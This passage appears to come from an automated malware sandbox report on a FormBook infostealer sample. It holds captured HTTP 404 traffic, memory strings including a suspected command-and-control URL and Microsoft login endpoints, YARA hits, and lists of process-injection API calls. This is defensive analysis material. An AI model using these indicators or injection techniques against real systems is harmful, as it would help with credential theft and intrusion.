                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sun, 24 Nov 2024 07:25:04 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:25:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ucg2Xsi5P7ooaC9F%2BKPYiH20vHxgRauK%2BUnIPS%2FrURGRdHRJxup9d2t%2BtBUrQFO%2F5Z6%2Fkqsw%2Fu6B9vSELzNhmAyJkVbJyN0DdNufKjJImqUYTZuE3KbnQ4jIu0fVTjjCo6cs9P4xDQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77a9e3c8947291-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1805&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=694&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:25:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iVgdUfRKAi8K4pE46ZEoIFJqiYcPB8hm%2BIlyP8CkeMZOH7PHSE2W%2FhGA1y%2F98gr%2Bt6mcymguZ8gzoHxDxPCa2NrlffQKXVj8bg60GNO9qsLfULohGy7qA2u8vjmi%2FTOVGWt%2BKGvKQw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77a9f5093f0c90-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1447&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eaTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(bY<;0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:25:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fexONy%2Bob8N63dYQRWbXx8Ca4d62lIxKAfR4uX7H2GjwdH1u445ulTczFMmDoQUFm48ywJX3yH9AQJ8Xsw1bJBUc%2F2NGKbPZj%2BYChPH03l3FcWm2uH2ZhlWqT4gbqQ9Pdd7x1rFOMA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77aa05f9ce4210-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1566&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1731&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 65 62 0d 0a 54 90 c1 6e c2 30 10 44 ef f9 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 98 4a 6d af b3 6f 76 67 56 dd 95 af cb e6 7d 57 61 dd bc d4 d8 ed 9f eb cd 12 93 07 a2 4d d5 ac 88 ca a6 bc 4d 1e a7 33 a2 6a 3b d1 85 72 72 6e b5 72 6c ac 2e 94 78 69 59 2f 66 0b 6c a3 60 15 fb 60 15 dd c4 42 51 86 d4 21 da 61 f4 cd f5 1f c6 cd 75 a1 2e ba 71 8c c4 9f 3d 77 c2 16 fb b7 1a 57 d3 21 44 c1 c7 c8 21 06 88 f3 1d 3a 4e 5f 9c a6 8a 2e d9 f6 64 ad 17 1f 83 69 db e1 1e 06 ff 02 14 9c 52 4c 79 11 87 63 ec 83 70 62 8b ab f3 2d 43 d2 e0 c3 09 12 d1 77 0c 13 50 8d 70 19 8f fd 99 83 8c ba 33 c1 8e e0 6f b2 9f b3 94 8b 28 ca 0f f8 06 00 00 ff ff e3 02 00 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: febTn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:25:20 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIBk17vPXbDECxtpzTCXTjUW6BZ7IaOe6646%2Bz0Rzdkumw10X%2BR%2FN3XoZDFOZpYWjY3uB6EbYq%2BUpF5SM3EVAXcqg3h22CJ%2FtWQzav437hw2pm%2BPIwdrn9smBJmjq%2FNyO7qHkSpGrg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77aa16cad4c47f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1698&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0
                Source: file.exeString found in binary or memory: http://tempuri.org/ianiDataSet.xsd
                Source: file.exeString found in binary or memory: http://tempuri.org/ianiDataSet1.xsd
                Source: file.exeString found in binary or memory: http://tempuri.org/ianiDataSet2.xsdM
                Source: QmkRHPDwxbW.exe, 00000008.00000002.3757593564.0000000005890000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.izmirescortg.xyz
                Source: QmkRHPDwxbW.exe, 00000008.00000002.3757593564.0000000005890000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.izmirescortg.xyz/cxxv/
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 00000007.00000002.3756768985.0000000003DEE000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3759140803.0000000005A90000.00000004.00000800.00020000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000002.3755312225.0000000003F9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: regini.exe, 00000007.00000002.3752723389.00000000025BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 00000007.00000002.3752723389.00000000025E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 00000007.00000002.3752723389.00000000025BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 00000007.00000002.3752723389.00000000025BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 00000007.00000002.3752723389.00000000025BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 00000007.00000002.3752723389.00000000025E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 00000007.00000003.1688328353.0000000007566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 00000007.00000002.3759140803.0000000005A90000.00000004.00000800.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3756768985.0000000004436000.00000004.10000000.00040000.00000000.sdmp, QmkRHPDwxbW.exe, 00000008.00000002.3755312225.00000000045E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: regini.exe, 00000007.00000003.1693124724.0000000007648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3755526536.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3755365242.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502482858.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1501034041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1502647624.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0042C8D3 NtClose,4_2_0042C8D3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2B60 NtClose,LdrInitializeThunk,4_2_017E2B60
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_017E2DF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_017E2C70
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E35C0 NtCreateMutant,LdrInitializeThunk,4_2_017E35C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E4340 NtSetContextThread,4_2_017E4340
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E4650 NtSuspendThread,4_2_017E4650
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2BF0 NtAllocateVirtualMemory,4_2_017E2BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2BE0 NtQueryValueKey,4_2_017E2BE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2BA0 NtEnumerateValueKey,4_2_017E2BA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2B80 NtQueryInformationFile,4_2_017E2B80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2AF0 NtWriteFile,4_2_017E2AF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2AD0 NtReadFile,4_2_017E2AD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2AB0 NtWaitForSingleObject,4_2_017E2AB0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2D30 NtUnmapViewOfSection,4_2_017E2D30
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2D10 NtMapViewOfSection,4_2_017E2D10
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2D00 NtSetInformationFile,4_2_017E2D00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2DD0 NtDelayExecution,4_2_017E2DD0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2DB0 NtEnumerateKey,4_2_017E2DB0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2C60 NtCreateKey,4_2_017E2C60
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2C00 NtQueryInformationProcess,4_2_017E2C00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2CF0 NtOpenProcess,4_2_017E2CF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2CC0 NtQueryVirtualMemory,4_2_017E2CC0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2CA0 NtQueryInformationToken,4_2_017E2CA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2F60 NtCreateProcessEx,4_2_017E2F60
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2F30 NtCreateSection,4_2_017E2F30
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2FE0 NtCreateFile,4_2_017E2FE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2FB0 NtResumeThread,4_2_017E2FB0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2FA0 NtQuerySection,4_2_017E2FA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2F90 NtProtectVirtualMemory,4_2_017E2F90
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2E30 NtWriteVirtualMemory,4_2_017E2E30
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2EE0 NtQueueApcThread,4_2_017E2EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2EA0 NtAdjustPrivilegesToken,4_2_017E2EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2E80 NtReadVirtualMemory,4_2_017E2E80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E3010 NtOpenDirectoryObject,4_2_017E3010
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E3090 NtSetValueKey,4_2_017E3090
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E39B0 NtGetContextThread,4_2_017E39B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E3D70 NtOpenThread,4_2_017E3D70
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E3D10 NtOpenProcessToken,4_2_017E3D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B84340 NtSetContextThread,LdrInitializeThunk,7_2_02B84340
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B84650 NtSuspendThread,LdrInitializeThunk,7_2_02B84650
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82AF0 NtWriteFile,LdrInitializeThunk,7_2_02B82AF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82AD0 NtReadFile,LdrInitializeThunk,7_2_02B82AD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02B82BA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02B82BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02B82BE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82B60 NtClose,LdrInitializeThunk,7_2_02B82B60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02B82E80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02B82EE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82FB0 NtResumeThread,LdrInitializeThunk,7_2_02B82FB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82FE0 NtCreateFile,LdrInitializeThunk,7_2_02B82FE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82F30 NtCreateSection,LdrInitializeThunk,7_2_02B82F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02B82CA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02B82C70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82C60 NtCreateKey,LdrInitializeThunk,7_2_02B82C60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02B82DF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82DD0 NtDelayExecution,LdrInitializeThunk,7_2_02B82DD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02B82D30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02B82D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B835C0 NtCreateMutant,LdrInitializeThunk,7_2_02B835C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B839B0 NtGetContextThread,LdrInitializeThunk,7_2_02B839B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82AB0 NtWaitForSingleObject,7_2_02B82AB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82B80 NtQueryInformationFile,7_2_02B82B80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82EA0 NtAdjustPrivilegesToken,7_2_02B82EA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82E30 NtWriteVirtualMemory,7_2_02B82E30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82FA0 NtQuerySection,7_2_02B82FA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82F90 NtProtectVirtualMemory,7_2_02B82F90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82F60 NtCreateProcessEx,7_2_02B82F60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82CF0 NtOpenProcess,7_2_02B82CF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82CC0 NtQueryVirtualMemory,7_2_02B82CC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82C00 NtQueryInformationProcess,7_2_02B82C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82DB0 NtEnumerateKey,7_2_02B82DB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B82D00 NtSetInformationFile,7_2_02B82D00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B83090 NtSetValueKey,7_2_02B83090
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B83010 NtOpenDirectoryObject,7_2_02B83010
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B83D10 NtOpenProcessToken,7_2_02B83D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B83D70 NtOpenThread,7_2_02B83D70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024293F0 NtCreateFile,7_2_024293F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02429640 NtDeleteFile,7_2_02429640
